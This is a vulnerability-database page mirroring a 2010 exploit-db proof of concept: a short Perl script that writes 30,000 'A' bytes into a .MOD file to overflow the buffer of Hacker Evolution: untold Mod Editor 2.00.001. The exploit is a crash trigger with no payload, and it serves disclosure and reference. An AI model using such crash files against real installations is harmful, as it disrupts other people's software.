Lucene search
K

Hacker Evolution Game: untold Mod Editor 2.00.001 - Buffer Overflow (PoC)

🗓️ 19 Jun 2010 00:00:00Reported by gunslinger_Type 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 31 Views

Hacker Evolution: untold Mod Editor 2.00.001 Buffer Overflow Po

Code
#!/usr/bin/perl
# Title         : Hacker Evolution: untold Mod Editor buffer overflow 
# Date          : June 19, 2010
# Author        : gunslinger_ <[email protected]>
# Web		: http://devilzc0de.com
# Blog		: http://gunslingerc0de.wordpress.com
# Software Link : http://www.exosyphen.com/page_hacker-evolution-untold.html
# Version       : 2.00.001
# Tested on     : Windows XP SP2
# Open Hacker Evolution Mod editor -> open file -> EVIL_STAGE.MOD

my $file= "EVIL_STAGE.MOD";
my $junk= "\x41" x 30000;
open($FILE,">$file");
print $FILE "$junk";
close($FILE);
print "MOD File Created successfully\n";

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

19 Jun 2010 00:00Current
7High risk
Vulners AI Score7
31